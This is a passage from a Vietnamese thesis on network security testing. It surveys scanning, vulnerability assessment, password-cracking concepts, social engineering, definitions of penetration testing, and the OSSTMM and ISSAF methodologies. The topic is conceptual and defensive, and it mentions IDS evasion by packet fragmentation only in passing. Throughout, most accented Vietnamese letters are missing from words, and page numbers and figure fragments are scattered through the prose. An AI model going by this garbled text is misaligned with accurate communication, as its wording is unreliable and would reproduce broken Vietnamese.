nh cc dch v DHCP hay DNS gi mo.
Xc nh cng v dch v mng (network port and service identification):
K thut ny o su tm hiu nhng thng tin c c t kho st mng
nhn bit cc cng v dch v ang hot ng trn nhng my ch v ng dng
no ang vn hnh dch v , v d cng 80 dng cho dch v web th IIS hay
18
Apache c ci t. Thng tin ny rt hu ch khi xc nh mc tiu trong KTXN.
Tt c cc cng c c bn u c kh nng nhn bit my ch v cng/dch v m
trn , ngoi ra mt vi cng c cn cung cp thm mt s thng tin nh HH
thng qua th thut gi l OS fingerprinting; ng dng chy trn cng thng qua
th thut nhn bit dch v lu file danh sch cng v dch v tng ng, lu
nhng c trng hnh x ca tng ng dng so snh vi hnh x ca ng dng
trn cng ang qut; phin bn ca ng dng thng qua th thut version scanning,
banner grabbing ly thng tin banner truyn bi cng t xa khi khi to kt ni.
Nhng thng tin ly c t cc k thut trn khng chc chn bi v ngi qun
tr mng c kinh nghim c th sa banner nhng c trng khc ca ng dng
che y ng dng thc s. Nn la chn cng c qut ty tnh hung c th, c
nhng cng c xc nh cng v dch v thng qua tng la kh tt, trong khi c
nhng cng c khc th tt hn bn trong tng la. Kt qu rt khc nhau, ph
thuc cng c qut c dng. Nu phi qut c bn trong v bn ngoi th qut
bn ngoi thc hin trc. trnh s pht hin ca IDS, c th dng cc k thut
i vi cc gi tin nh phn r, gp chung, chng cho, hn lon nhm lm cc gi
tin xut hin ging nh bnh thng. Kim th bn trong t c xu hng dng
phng php ch ng bi v kiu qut ny t b pht hin hn. Ngoi ra, kim th
bn trong cng hay dng cc gi tin c bin i v d dng pht hin cc
im yu yu cu gi d liu ty bin cao. Qu trnh ny cng nh hnh c mt
s im yu tim tng khi bit ng dng v s phin bn ca ng dng.
Qut l hng (vulnerability scanning):
Ging nh qu trnh xc nh cng v dch v mng, nhng giai on ny tp
trung vo tm nhng im yu trn cc cng v dch v tm c. Qut l hng c
th pht hin nhng phn mm ht hn, nhng li cha c cp nht v c cu
hnh sai. nhn bit im yu th thng so snh thng tin tm c v HH,
ng dng vi thng tin im yu lu trong CSDL im yu ca phn mm qut.
19
Qut l hng kim tra s tun th chnh sch an ninh v chnh sch s dng
dch v. Ngoi ra cn cung cp thng tin mc tiu cho KTXN v gip gia c
im yu. Cc phn mm qut l hng c th qut t xa hay cc b, qut bn trong
hay bn ngoi. Qut l hng gi lp mt mu tn cng sau xem cch hnh x v
phn ng ca h thng ri so snh vi c trng hnh x ca nhng h thng c
im yu c lu tr trong CSDL xc nh s tn ti ca im yu c gi l
qut l hng da vo c trng. Cc cng c qut l hng thng n nh mc
ri ro ca im yu. Tuy nhin, kh khn ca vic ny l cc im yu c lp
thng c mc ri ro thp nhng khi tn ti nhiu im yu th c th mc
ri ro rt cao. Ngoi ra cc phn mm qut l hng cng c tiu ch nh gi v
xp loi mc ri ro khc nhau cng l mt kh khn. T l pht hin sai hay
cnh bo sai cng kh cao, ngi kim th nn xc nh kh nng ca phn mm
qut v cu hnh gii hn phm vi qut gim thiu cc t l trn.
Qut mng khng dy (wireless scanning):
Mng khng dy nh tn gi l mi trng cc thit b kt ni vi nhau m
khng cn dy dn vt l. Ngy nay, vi s pht trin ca cng ngh khng dy v
s tin li khi s dng, cc thit b khng dy ngy cng c s dng nhiu nn
cc t chc ngy cng coi trng kim th mng khng dy bo v mi trng
mng ny [i14][i15]. Phn mm qut khng dy thng ci t trn thit b c ng-
ten khng dy nh my tnh xch tay, thit b cm tay hoc thit b c chng. Cc
phn mm ny nn c kh nng qut tt c cc knh, trn cc di tng s ln.
Ngoi ra, mt s phn mm cng tch hp chc nng v bn hay GPS cho php
nh v thit b khng dy. Qut khng dy c th dng k thut qut th ng v
qut ch ng, ng thi cn c k thut truy vt thit b khng dy nh v
thit b . Qut thit b bluetooth cng l mt k thut qut khng dy cn cho cc
t chc c s dng thit b bluetooth. c th nh v c thit b khng dy
20
cn kh nng v bn ca phn mm, kin thc ca ngi vn hnh v ng-ten
khng dy ph hp.
1.3.3. Cc k thut xc nhn im yu ca mc tiu
Sau khi tm c cc im yu c pht hin trong giai on pht hin v
phn tch mc tiu th k thut xc nhn im yu ca mc tiu (target
vulnerability validation techniques) chng minh cc im yu tn ti v mi
e da xut hin l cn thit. K thut ny cn ngi kim th c nhiu kinh
nghim v phi thc hin cn thn v n nh hng tim tng n h thng mc
tiu nhiu hn k thut khc.
B mt khu (password cracking):
Khi mt khu c to ra, mt k thut m ha mt chiu s c dng
bin i mt khu thnh mt gi tr gi l gi tr bm, k thut m ha mt chiu
gi l k thut bm. Gi tr bm c lu tr trong h thng. Khi ngi dng
nhp mt khu, k thut bm c p dng cho mt khu pht sinh mt gi
tr bm mi v so snh vi gi tr bm lu tr trong h thng. Nu hai gi tr bm
ging nhau th ngi dng c xc thc. B mt khu l qu trnh khi phc li
mt khu t gi tr bm ly c t ni lu tr trong h thng hoc bt c khi
truyn trn mng. Do k thut bm l k thut mt chiu nn tm c mt khu
thng th c mt phn mm ly cc mt khu c on trc thc hin k thut
bm v so snh vi gi tr bm ly c. Nu ging nhau th mt khu c tm ra.
Mt khu on trc c th l ton b cc kt hp ca cc k t trong bng ch ci
v c di cho trc. K thut ny gi l vt cn (brute force) v tn thi gian
lu tm ra mt khu, tuy nhin k thut ny c coi l chc chn tm ra mt
khu min l c thi gian v nng lc my tnh mnh. thu hp phm vi tm
kim, mt khu on trc c th ly cc t trong t in v ngi dng thng t
cc mt khu l t c ngha d nh. K thut ny gi l tn cng t in
21
(dictionary attack). K thut lai gia hai k thut trn gi l k thut lai (hybrid
attack), dng cc t trong t in v thm cc nhm s hay k t c bit (v d:
password99, password!@,...) . Mt k thut na gi l bng cu vng (rainbow
table). K thut ny da trn vic tnh ton trc cc gi tr bm, lu thnh bng
mt khu v gi tr bm tnh c. Khi dng ch vic so snh cc gi tr bm trong
bng vi gi tr bm ly c. K thut ny nhanh nhng chim nhiu khng gian
lu tr.
KTXN (penetration testing):
Trnh by phn 4 chng 1.
Cng ngh x hi (Social engineering):
K thut ny nhm c gng nh la mt ai h tit l thng tin nh mt
khu, thng tin mng, cu hnh, m thng tin ny c th dng tn cng h
thng. la th tin tc thng lin lc vi ngi gi thng tin qua in thoi, e-
mail la h tit l thng tin, hoc lm gi mt web site ca cc t chc ngn hng
hoc i tc ngi dng nhp nhng thng tin nhy cm vo . Tham kho
thm chi tit trong [25].
1.4. Khi nim v kim th xm nhp
Xm nhp c th c chia lm hai loi da vo cch tip cn mc tiu l:
xm nhp cc b tip cn vt l, hoc xm nhp t xa tip cn thng qua mng
(LAN, WAN, Internet,). Nh nu phn u, ni dung ca lun vn ch
cp n KTXN t xa gi tt l KTXN, ngha l dng cc cng c v k thut
CNTT ph hng cc kim sot v xm nhp vo mng my tnh.
Trc tin, ta xem xt mt s nh ngha v KTXN
22
KTXN c th c nh ngha l hnh ng xm nhp hp php v c s
cho php ca ch s hu nh v v khai thc thnh cng cc l hng trn cc h
thng my tnh hoc mng my tnh vi mc ch lm cho h thng c an
ton hn [13].
nh ngha khc trong cun sch Metasploit The penetration testers
guide ca cc tc gi David Kennedy, Jim OGorman, Devon Kearns v Mati
Aharoni l: KTXN l cch bn ng gi lm k tn cng v dng cc phng php
tn cng ca nhng k tn cng ph hng nhng kim sot an ninh v truy cp
tri php vo h thng ca t chc no [14].
nh ngha ca t chc NIST v KTXN nh sau: KTXN l KTAN trong
ngi kim th ng gi nhng cuc tn cng nh trong thc t pht hin cc
phng php b gy nhng c tnh an ninh ca cc ng dng hoc h thng. N
thng bao gm vic pht ng nhng tn cng thc vo h thng v d liu thc,
dng nhng cng c v k thut hay dng ph bin ca k tn cng [24].
nh ngha ca cng ng OWASP nh sau: Mt KTXN l mt phng php
nh gi an ninh ca mt h thng my tnh hoc mng bng cch m phng mt
cuc tn cng [27].
Tm li, qua cc nh ngha trn ta c th thy, KTXN tin xa hn so vi vic
ch dng cng c qut l hng tm im yu, n bao gm c vic tm im yu
v s phi hp ca cc im yu ri xut v thc hin cc cuc tn cng
chng minh cc im yu l c thc v ch ra tc hi ca n. Mt cuc KTXN
ng cch lun kt thc bng nhng khuyn co nh v v sa cha nhng li
tm thy khi kim th. tr thnh mt ngi chuyn gia trong lnh vc
KTXN, ta khng ch am tng v an ninh, s dng thnh tho cc cng c tn
cng mng m cn phi c kh nng ng ph trong tng tnh hung xm nhp mt
cch thng minh, nhanh nhy, phn tch thng tin tt v nht l c t cch o c
khi hnh ngh. Ngi KTXN cng c gi l:
23
Pen tester
PT
Ethical hacker (hacker o c)
White hat hacker (hacker m trng)
V sao cn phi KTXN?
Cc t chc, doanh nghip vi ng dng CNTT mnh u u t ln cho
chng trnh an ninh ca mnh bo v nhng h tng CNTT quan trng, pht
hin nhng k h trong h thng bo v v ngn chn nhng d liu quan trng
b ly cp. KTAN l mt trong nhng cch hiu qu nht pht hin nhng im
yu, k h hoc thiu st trong cc chng trnh an ninh ca h. Tuy nhin, nhng
im yu n l khng tit l c n c th b li dng xm phm an ninh hay
khng. Bng vic lm tn thng nhng cht chn kim son an ninh v vt qua
c ch an ninh thng qua mt hoc mt tp hp cc im yu, ngi KTXN c kh
nng pht hin nhng cch m mt tin tc c th dng gy tn thng cho h
thng CNTT ca t chc v c th ph hoi ton b t chc . Mc ch ca
ngi KTXN khng phi l nhm n mt hay nhiu h thng, m l ch ra trong
cc c ch kim sot an ninh ang dng ca t chc, lm th no mt k tn cng
c th gy thit hi nghim trng cho t chc v tc hi ca hnh ng tn cng
. Qu trnh ny thng dng gip h thng an ton trc nhng tn cng
trong tng lai.
1.5. Tm tt chng 1
Trong chng ny ca lun vn, ch yu trnh by tng hp cc khi nim v
kim th, KTAN v KTXN cng cc k thut lin quan. KTAN thng c chia
lm hai nhnh l KTAN phn mm v KTAN mng. KTAN phn mm cng chia
lm hai nhnh l KTAN chc nng chuyn tm nhng li ca chc nng an ninh
c thit k ca h thng, v KTAN im yu (hay KTAN xm nhp) tp trung
24
nghin cu cch thc vt qua bc tng an ninh bo v phn mm nhm tm hiu
phn ng ca phn mm c ng nh mong i khi thit k. KTAN mng vi i
tng l h thng mng bao gm qut l hng v KTXN. Phn bit s khc nhau
gia qut l hng v KTXN.
25
Chng 2. CC PHNG PHP
KIM TH XM NHP
thc hin KTAN ni chung v KTXN ni ring, u phi c nhng
phng php khoa hc lm nn tng l lun gip trnh kh nng thc hin nhng
quy trnh kim th b thiu st, sai lm, chch hng, v khng nht qun. Nh
gii thiu chng 1, KTXN l mt nhnh ca KTAN v thng c nghin cu
nh mt phn ca KTAN. Chng ny trnh by nhng phng php lun KTAN
ph bin v c p dng vo thc t trn th gii, tp trung trnh by phn
KTXN ca tng phng php.
Phng php lun KTAN khng h n gin, KTXN cng phc tp hn. N
m t qu trnh hoc mt gii php, ch ra ci g c kim th hoc ai l ngi
kim th cng nh khi no v u. Hu ht cc phng php ny thng phn r
quy trnh KTAN thnh cc quy trnh nh hn v c l gii r rng. Phng php
lun KTAN cng phi gii thch kim th kim chng ci g, cc qu trnh con
thc hin ci g. Cui cng phng php phi m bo c s liu m bo
chnh xc, d hiu, v d so snh, i chng. Phng php OSSTMM tuy khng
tp trung chuyn su vo KTXN, nhng n c coi l phng php KTAN ton
din nht, th mnh ca n l tp trung lng ha cc khi nim an ninh, phn bit
r rng cc hng v knh tn cng nn lun vn cng trnh by y tn dng
nhng vn th mnh m cc phng php khc khng cp. Phng php
ISSAF tp trung nu phng php KTXN ng dng, tuy vn cao cc k thut
KTAN giai on pht trin phn mm nhng phng php ny xy dng mt b
checklist kh cng phu, y c th coi l ti liu tham kho kh tt cho nhng
ngi lm KTXN. OWASP li theo hng KTAN ng dng web, y l k thut
khng th thiu i vi ngi KTXN v ngy nay hng xm nhp vo t chc
ch yu vn thng qua ng dng web.
26
Chng ny ng thi cng tp trung lm r nhng vn v o c ngi
KTAN, v r rng KTAN l lnh vc tip xc vi nhng ti sn thng tin nhy cm
ca cc t chc, cng ty nn ngi kim th ngoi vic phi c phm cht o c
tt cn phi nm c quy tc ngh nghip, trnh li dng hoc b bn th ba li
dng gy phng hi cho t chc yu cu kim th.
2.1. Phng php OSSTMM
2.1.1. Khi nim chung v thut ng
Open Source Security Testing Methodology Manual (OSSTMM) pht m l
awstem l mt d n ca Institute for Security and Open Methodologies
(ISECOM) t chc phi li nhun c thnh lp New York, Hoa K v
Catalonia, Ty Ban Nha. D n ny pht trin trong mt cng ng m, vi cc
i tng tham gia bnh ng, v khng nh hng bi chnh tr v thng mi
[5][i4]. Phng php ny c nng cp ln phin bn 3.0
y l mt phng php khoa hc gip m t chnh xc cc an ninh hot
ng (operational security OpSec) c trng thng qua kim th theo mt cch
nht qun v lp i lp li trn cc mt vt l, tng tc con ngi, v tt c cc
hnh thc kt ni nh khng dy, c dy, tng t v s [5]. Phng php ny ph
hp vi hu ht cc kiu kim th nh KTXN, tin tc o c, nh gi an ninh,
nh gi l hng, i , i xanh,
Theo OSSTMM, OpSec l mt s phn tch v kim sot. mt mc tiu
c an ninh th n phi tch khi cc mi e da c th tng tc mt cch trc
tip hoc gin tip ti mc tiu. An ninh hon ho l trng thi m mc tiu c
tch ri hon ton vi mi e da. Thc t th mc tiu m khng tng tc vi
mi trng xung quanh th khng cn ngha g, v vy an ton ta phi a vo
nhng kim sot gim bt mc nh hng ca mi e da.
27
T gc k thut, phng php tip cn chia thnh bn nhm chnh, l
phm vi, Knh, Ch mc, v Hng. Phm vi l tt c cc ti sn hot ng trong
mi trng mc tiu trn xc nh mt quy trnh thu thp thng tin. Mt knh
xc nh loi giao tip v tng tc vi cc ti sn c th l vt l, di tng s, v
truyn thng. Ch s l mt phng php c coi l hu ch khi phn loi v m
cc ti sn mc tiu tng ng vi tng loi c th ca chng, chng hn nh, a
ch MAC, v a ch IP. Cui cng, Hng m theo ngi kim th c th nh
gi v phn tch tng ti sn chc nng. Ton b qu trnh ny khi to mt l
trnh k thut theo hng nh gi ton b mi trng mc tiu v c gi l
Phm vi kim th.
Hnh 3: Khi qut m hnh OSSTMM
Phng php OSSTMM cng nh ngha mt lot cc thut ng c s dng
nh: kim sot, b mt tn cng, hng, hng tn cng, an ninh, an ton, xp,
hn ch, l hng, im yu, RAV, hot ng, an ninh hon ho,
Ngoi ra, Phng php OSSTMM xy dng mt c s l thuyt m t chi tit
cc thnh phn cu thnh an ninh hot ng v lng ha cc thnh phn ny cng
cng thc tnh ton ca chng. An ninh l mt khi nim tng i m vi mc
an ninh thc t ny th c th l tt i vi t chc ny nhng li qu mt an ninh
so vi t chc khc. V vy, lng ha cc thuc tnh an ninh gip tnh ton v
biu din an ninh mt cch nht qun v lp i lp li.
Phm vi
COMSEC
SPECSEC
PHYSSEC
Hng
Ch mc
Mc
tiu
Knh
28
C 18 i lng c bn cn xc nh khi kim th c bao gm nhng i
lng thuc nhng nhm nh sau: Ba i lng ca An ninh hot ng hay cn
gi l xp; 10 i lng ca Kim sot; 5 i lng ca Hn ch.
Khi c s nhp nhng cc chc nng ca cc im tng tc, chng ta gi l
xp (porosity). xp lm gim s khc bit gia mt mi e da v truy cp.
N gm 3 thnh phn i din cho ba i lng An ninh hot ng: Tm
nhn(Visibility), Truy cp (Access), Tin tng (Trust).
Kim sot gm hai nhm, nhm u l Kim sot tng tc lp A bao gm 5
i lng: Xc thc (Authentication), Bi thng (Indemnification), Do dai
(Resilience), Chinh phc (Subjugation), Lin tc (Continuity).
Nhm hai l Kim sot quy trnh lp B bao gm 5 i lng: Khng thoi
thc (Non-Repudiation), B mt (Confidentiality), Ton vn (Integrity), Ring t
(Privacy), Cnh bo (Alarm).
Cui cng l Hn ch l s khng c kh nng hot ng ca c ch bo v.
OSSTMM phn ra nm loi hn ch i din cho 5 i lng l: L hng
(Vulnerability), im yu (Weakness), Quan tm (Concern), Tip xc (Exposure),
Bt thng (Anomaly).
2.1.2. Phng php lun
C nm knh an ninh l Truyn thng, Mng d liu, Vt l, Con ngi v
Khng dy chia thnh 3 lp knh: COMSEC Truyn thng, Mng d liu;
SPECSEC Vt l, Con ngi; PHYSSEC Khng dy. Cc knh l nhng
phng tin c bit tng tc vi cc mc tiu. Tng knh s c cch thc
kim th v tnh ton cc i lng c bn khc nhau.
Bng sau m t cc knh. S t chc ny c thit k lm quy trnh kim
th thun tin trong khi gim thiu nhng chi ph khng hiu qu.
29
Lp Knh M t
An ninh vt l
(PHYSSEC)
Con ngi Bao gm nhn t con ngi trong truyn
thng tng tc hoc vt l hoc tm l.
Vt l KTAN vt l ni cc knh v bn cht va
vt l v va khng c yu t in.
An ninh di
tng s
(SPECSEC)
Khng dy Bao gm tt c cc truyn thng in t, tn
hiu, v khng kh c thc hin truyn tn
hiu khng cn cp.
An ninh kt ni
(COMSEC)
Truyn thng Bao gm tt c mng truyn thng, s hoc
tng t vi cc tng tc thng qua in
thoi hoc mng ging nh in thoi.
Mng d liu Bao gm tt c h thng in v mng d liu
tng tc thng qua cp v mng c dy.
Bng 1: Cc knh tng tc
Cc kiu kim th khc nhau da trn s lng thng tin m ngi kim th
bit v mc tiu, mc tiu bit ci g v ngi kim th hoc mong i g t kim
th, v tnh hp php ca kim th. Mt vi kim th s kim tra k nng ca
ngi kim th nhiu hn l KTAN thc s i vi mc tiu.
Blind Gray
Box Tandem
Double
Double blind
Gray Box
Reversal
Hnh 4: Cc kiu kim th
Nhn thc ca ngi tn cng v mc tiu
Nhn
thc
ca
mc
tiu
v
cuc
tn
cng
30
Kiu M t
1 Blind Ngi kim th khng c kin thc v c ch phng th, ti sn,
hoc cc knh ca cc mc tiu. Mc tiu c chun b cho kim
th, bit trc tt c cc chi tit ca cuc kim th.
2 Double
blind
Ngi kim th khng c kin thc v c ch phng th, ti sn,
hoc cc knh ca cc mc tiu. Mc tiu khng c thng bo
trc v phm vi kim th, cc knh kim th, hay vt kim th.
3 Gray
box
Ngi kim th c kin thc hn ch v phng th v ti sn ca
cc mc tiu v kin thc y v cc knh. Mc tiu c chun
b cho kim th, bit trc tt c cc chi tit ca cuc kim th.
4 Double
gray box
Ngi kim th c kin thc hn ch v phng th v ti sn ca
cc mc tiu v kin thc y v cc knh. Mc tiu c thng
bo trc ca khung phm vi v thi gian ca kim th nhng
khng phi l cc knh kim th hoc hng kim th.
5 Tandem Ngi kim th v mc tiu chun b cho vic kim th, c hai u
bit trc tt c cc chi tit ca cuc kim th.
6 Reversal Ngi kim th nhm cc mc tiu vi kin thc y v cc quy
trnh v an ninh hot ng, nhng mc tiu khng bit g, lm th
no, hoc khi no Ngi kim th s kim th.
Bng 2: M t cc kiu kim th
Phng php OSSTMM cng ra nhng nguyn tc cam kt nhm t ra
nhng quy tc v hng dn hot ng trn thc t khi tip th v bn hng, hp
ng tha thun kim th, thc hin kim th, qun l kt qu kim th.
Quy trnh KTAN hot ng l vic kim tra cc s kin ri rc ca mt h
thng ng v ngu nhin. iu ny ngha l ta s thc hin tun t cc ca kim
th theo thi gian trn mt h thng lun thay i v khng lun cho mt u ra
i vi nhng u vo cung cp. OSSTMM p dng quy trnh l s kt hp ca
quy trnh bn im (4PP) v ba cu hi (Trifecta) gm nhng bc nh sau:
Bc 1: Thu thp d liu th ng trng thi hot ng bnh thng hiu
mc tiu.
Bc 2: Kim th tch cc nhng hot ng bng cch kch ng nhng hot
ng vt qu mc bnh thng.
31
Bc 3: Phn tch d liu nhn c trc tip t cc hot ng kim th.
Bc 4: Phn tch d liu gin tip t ti nguyn v ngi vn hnh
Bc 5: Xem xt tng quan v hp nht thng tin thu c t kt qu bc
3 v 4 xc nh cc quy trnh an ninh hot ng.
Bc 6: Xc nh v hp nht cc li.
Bc 7: Thu thp s liu t cc hot ng c bnh thng v kch ng.
Bc 8: Xem xt tng quan v hp nht thng tin gia cc bc 1 v 2
xc nh mc bo v v kim sot ti u.
Bc 9: nh x trng thi hot ng ti u n quy trnh (bc 5).
Bc 10: To mt k h phn tch xc nh ci g cn thit nng cao cho
cc quy trnh v kim sot cn thit cho bo v v kim sot (bc 5) t c
trng thi hot ng ti u (bc 8) t ci hin hnh.
Hnh 5: Quy trnh kim th an ninh hot ng
Kim sot li: Phng php OSSTMM quan im li khng phi l mt du
hiu tiu cc m v mt no n l tch cc. V li c th khng phi l do ngi
kim th, hiu lm th no v cc li tn ti u trong khi kim th th hp l
Mc
tiu
Mi
trng
1.Thu thp
th ng
2.Kch
ng mc
tiu
3.Phn
tch kt
qu tr v
4.Phn
tch gin
tip
6.xc
nh li
7.thu
d liu
5.Tng
quan v
hp nht
8.xc
nh mc
bo v
ti u
9.nh
x
10. phn
tch k h
32
hn nhiu so vi vic mong i ngi kim th khng mc li. Hn na, ngi
kim th c gng mt cch khng hp l c th bt ng b li; biu th li nh l
iu tiu cc lm gim gi tr cc kim th k lng trong thc t. C 12 loi li,
(dng tnh gi, m tnh gi, dng tnh xm, m tnh xm, li con ngi,) v
ghi li li kim th gip tm tt mi trng theo cch n gin ha.
Kt qu kim th thng i km vi gii php ngh hoc t vn, khng bt
buc trong kim th OSSTMM. Thng th khng c gii php thch hp da trn
quan im gii hn ca ngi kim th trong mi trng khch hng. V vy, gii
php khng phi l mt phn ca kim th OSSTMM. Ngi kim th dng bo
co STAR kt lun khi kim th bng phng php ny, trong ch r nhng
vic lm c v kt qu, nhng vic cha lm c v nhng vic cha r rng
cng nguyn nhn. Ta c th ti mu bo co ny ti trang web ca ISECOM [i4].
2.1.3. Phn tch nh lng
nh gi an ninh hot ng da trn s liu l phng php tnh ton cc
thng s an ninh hot ng cui cng a ra c gi tr an ninh thc t. Hu
ht mi lnh vc trong nghin cu khoa hc cng nh x hi u xy dng mt
thang o chun. Tuy nhin, trong lnh vc an ninh vn cha c mt thang o chun
gip cho vic nghin cu an ninh c thun tin hn. Cc chng trnh KTAN
u nh gi mc an ninh da trn thang o v n v o ca ring n. V d c
chng trnh ch chia thang o l thp, trung bnh v cao, trong khi mt s chng
trnh khc th chia l thp, trung bnh, cao v rt cao. Thm ch, o lng cc thuc
tnh an ninh CNTT thng da trn chuyn mn, trc gic, v ci nhn ca ngi
nh gi to ra mt trt t, m trt t ny sau c nh lng (v d, 1 =
thp, 2 = trung bnh, 3 = cao). Phng php OSSTMM xy dng ln cc thuc tnh
an ninh v thang o tng ng. D n cng c gng thc y nhng thuc tnh v
thang o ny thnh chun.
33
Hnh 6: File Excel tnh RAV
i lng RAV l thc o b mt tn cng, l s cc tng tc ti mc tiu
khng kim sot, c tnh ton theo cn bng s lng gia an ninh hot ng,
kim sot, v hn ch. y c dng lm n v o an ninh thc t. Dng RAV
hiu b mt tn cng b bc l bao nhiu. Trong thang o ny, 100 RAV l cn
bng hon ho v gi tr RAV t hn l t kim sot an ninh hn v nh vy lm
tng b mt tn cng. Nhiu hn 100 RAV ch ra nhiu kim sot hn cn thit m
bn thn n c th l vn v kim sot thng thm tng tc cng nh ny sinh
vn phc tp v bo tr trong phm vi [5].
34
Phng php OSSTMM xy dng mt cng thc tnh An ninh thc t theo
n v o l RAV, cng thc ny da trn 18 gi tr c bn. M t chi tit cng
thc ny ti Ph lc B. OSSTMM cng son sn mt cng c h tr tnh cng thc
ny t ng bng file bng tnh Excel c a ln website ca ISECOM [i4]
hnh 5. Ch cn o v in s liu 18 i lng c bn th file ny s t ng tnh
ra An ninh thc t l bao nhiu RAV. Theo OSSTMM th 100 RAV c coi l an
ninh tuyt i v 0 RAV l hon ton khng c an ninh. C th tm tt cch tnh
18 gi tr trn theo bng sau:
STT Loi M t
xp
1 Tm nhn S lng cc mc tiu thy c trong phm vi.
V d: Kim th trong lp phm vi HUMSEC, 50 nhn vin,
tuy nhin ch c 38 trong s tng tc vi kim th qua
hng v knh. C ngha tm nhn l 38.
2 Truy cp Tnh bng cch m tng truy cp cho mi im tng tc.
3 Tin tng Tnh bng cch m tng Tin tng cho mi im tng tc.
Kim sot
1 Xc thc m tng trng hp yu cu xc thc truy cp.
2 Bi thng m tng trng hp dng phng thc trch nhim php l
v bo m bi thng cho tt c ti sn trong phm vi.
3 Chinh phc m tng trng hp Truy cp hoc Tin tng trong phm vi
hon ton khng cho php dng kim sot theo ngi dng.
4 Lin tc m tng trng hp Truy cp hoc Tin tng trong phm vi
m bo rng khng c s gin on khi tng tc qua knh
v hng ngay c khi c li.
5 Do dai m tng trng hp Truy cp hoc Tin tng trong phm vi
vn gi c an ton khi li hoc cung cp cc truy cp mi
khi an ninh b hng.
6 Khng thoi
thc
m tng trng hp ca Truy cp hoc Tin tng m bo
rng s tng tc c th xy ra ti mt thi im c th gia
cc bn c th c xc nh v ghi nhn.
7 B mt m tng trng hp Truy cp hoc Tin tng trong phm vi
c phng tin duy tr ni dung thng tin gia cc bn ang
tng tc khng c tit l.
8 Ring t m tng trng hp Truy cp hoc Tin tng trong phm vi
35
c phng tin thc hin cc phng thc tng tc khng
tit l gia cc bn tng tc.
9 Ton vn m tng trng hp Truy cp hoc Tin tng trong phm vi
m bo rng qu trnh tng tc v truy cp n ti sn khng
b hng, dng li, tip tc, chuyn hng, hoc o ngc m
khng c bit bi cc bn lin quan.
10 Cnh bo m tng trng hp Truy cp hoc Tin tng trong c ghi
li d liu hoc to mt thng bo khi c s gia tng xp
khng c php v khng mong mun.
Hn ch
1 L hng m mi thiu st hoc li mt ngi hoc mt qu trnh c
th truy cp, t chi truy cp n ci khc, hoc giu bn thn
hoc ti sn trong phm vi bt chp cc bo v.
2 im yu m tng thiu st hoc li trong cc kim sot tng tc: xc
thc, do dai, bi thng, chinh phc, v lin tc.
3 Quan tm m tng thiu st hoc cc li trong kim sot quy trnh:
khng thoi thc, b mt, ring t, ton vn, v cnh bo.
4 Tip xc m tng hnh ng v l, thiu st, hoc li cung cp tm
nhn trc tip hoc gin tip n cc mc tiu hoc ti sn.
5 Bt thng m tng thnh phn khng xc nh c hoc khng r
rng m khng th tnh vo hot ng bnh thng.
Bng 3: Cc i lng c bn dng trong tnh an ninh thc t
2.1.4. Lung cng vic
Phng php ny xy dng hot ng kim th theo nh dng phn cp: th
nht l knh; th hai l m-un; th ba l nhim v. Nh nu trn, c tt c 5
knh, ng vi mi knh s ln lt thc hin 17 m-un, chia thnh 4 giai on:
giai on bt u gm 3 m-un u tin, giai on tng tc gm cc m-un t
4 n 7, giai on iu tra gm cc m-un t 8 n 13 v giai on can thip gm
cc m-un cn li t 14 n 17. Trong tng m-un, ty thuc vo tng knh ta
c cc nhim v phi lm c th tm c cc gi tr cho 18 i lng phn
trn (M t chi tit trong chng 7, 8, 9, 10 v 11 ca hng dn OSSTMM 3[5]).
Nh vy, ngi kim th phi thc hin 17 * 5 = 85 phn tch trc khi a ra
c bo co cui cng.
36
Hnh 7: Lung cng vic duy nht (p dng cho tt c cc kiu KTAN)
2.1.5. Kt lun v phng php OSSTMM
T nhng m t phng php OSSTMM trn, ta c th tm lc mt s c
tnh v li ch chnh ca phng php nh sau:
Thc hnh phng php OSSTMM lm gim ng k s xut hin cc
li tiu cc gi v tch cc gi v cung cp php o an ninh chnh xc.
Khung lm vic ny thch nghi vi nhiu loi KTAN, chng hn nh
KTXN, kim th hp trng, nh gi l hng, v.v.
N m bo nh gi c thc hin trit v kt qu c th c
tng hp mt cch nht qun, nh lng, v ng tin cy.
1. xem xt
c im
2.Hu cn
3.Xc minh
pht hin ch
ng
4.Kim th
tm nhn
5.Xc minh
truy cp
6.Xc minh
tin tng
7.Xc minh
kim sot
8.Xc minh
quy trnh
9.Xc minh
cu hnh
10.Xc minh
thuc tnh
11.Xem xt
chia tch
12.Xc minh
tip xc
13.Tm kim
cnh tranh
14.Xc minh
tip xc
15.Kim th
quyn
16.Xc minh
sng st 17.Xem xt
cnh bo v
log
37
Cc s liu an ninh c nh gi c th ly c bng cch s dng
phng php RAV. RAV tnh ton gi tr an ninh thc t da trn an
ninh hot ng, kim sot thit hi, v hn ch. Gi tr c bit n
nh l s im RAV i din cho trng thi an ninh hin ti ca mc
tiu.
Cc bo co nh gi chnh thc bng cch s dng cc mu Bo co
kim tra KTAN (STAR) c th thun li cho qun l, cng nh gip
i ng k thut xem xt cc mc tiu kim th, cc gi tr nh gi ri
ro, v u ra t mi giai on kim th.
Phng php lun ny c cp nht thng xuyn vi cc xu hng
KTAN, cc quy nh, v cc mi quan tm v o c mi.
Cc quy trnh OSSTMM c th d dng c phi hp vi cc quy
nh ca cc ngnh cng nghip, chnh sch kinh doanh v lut php.
Ngoi ra, mt chng nhn kim th hi iu kin cng c th c
cng nhn trc tip t ISECOM.
2.2. Phng php ISSAF
2.2.1. Gii thiu
Information System Security Assessment Framework (ISSAF) [i5] l phng
php lun KTAN ca t chc OISSG, ra i nm 2003, cho php ngi nghin
cu, an ninh CNTT chuyn nghip tham gia ng gp, tho lun trong lnh vc an
ninh CNTT.
ISSAF l mt khung lm vic KTAN ngun m, tp trung chnh vo KTXN.
Khung lm vic ca n c phn vo mt s loi lnh vc gii quyt cc nh gi
an ninh theo mt trnh t. Mi lnh vc nh gi cc b phn khc nhau ca mt h
thng mc tiu v cung cp d liu u vo cho nhm cng vic an ninh thnh
cng. ISSAF pht trin tp trung vo hai lnh vc ca KTAN: qun l v k thut.
38
Mt qun l thc hin qun l nhm cng vic v cc kinh nghim thc t tt nht
phi c tun th trong sut qu trnh kim th, trong khi mt k thut thc hin
b quy tc ct li, th tc cn tun th v to ra mt quy trnh nh gi an ninh y
.
Trong lnh vc qun l, ISSAF chn cch tp trung mng qun l ri ro doanh
nghip (Enterprise Risk Management). Cch tip cn c h thng v mt qun l
cho php p dng an ninh ging nh mt hot ng kinh doanh thng ngy, nhm
xc nh tng bc cc th t cc hot ng cn c thc hin, v sau qun l
cc hot ng ny tng ci mt cho n khi m bo cung cp qun l an ninh mc
hp l c th c cho cc ti sn thng tin ca h. ISSAF xy dng mt m hnh
